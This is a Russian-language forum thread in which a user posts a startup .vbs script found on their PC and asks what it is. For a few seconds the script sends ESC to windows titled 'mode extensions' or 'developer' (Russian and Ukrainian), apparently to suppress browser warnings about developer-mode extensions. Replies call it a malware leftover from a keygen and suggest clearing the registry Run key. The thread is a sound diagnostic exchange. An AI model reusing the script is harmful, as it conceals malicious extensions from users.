Неизвестный скрипт при запуске
При запуске компьютера на пару секунд появляется окно командной строки, я успев его заморозить, решил посмотреть в Process Hacker что это за процесс и что его запускает, не найдя чего либо интересного я решил посмотреть при помощи CCleaner, и увидел там .vbs скрипт, найдя его и посмотрев код я понял что это оно
Вот этот код:
Set wshShell = CreateObject("WScript.Shell")
startTime = Now
doWhileTimeout = 7 / 86400
Do While Now - startTime < doWhileTimeout
If wshShell.AppActivate("mode extensions") or wshShell.AppActivate("разработчика") or wshShell.AppActivate("розробника") Then
wshShell.SendKeys "{ESC}"
End If
WScript.Sleep 10
Loop
If Now - startTime >= doWhileTimeout Then
WScript.Quit
End If
Прошу скажите что это такое?
Это украинский "вирус"
Кусок несостоявшейся малвари, установившийся с каким-то кейгеном или другим чем пиратским. Обычный скрипт, который запускается программой WScript.exe
Откройте regedit и в ветке HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run
удалите всё лишнее
Этот скрипт похоже закрывает какое то окно.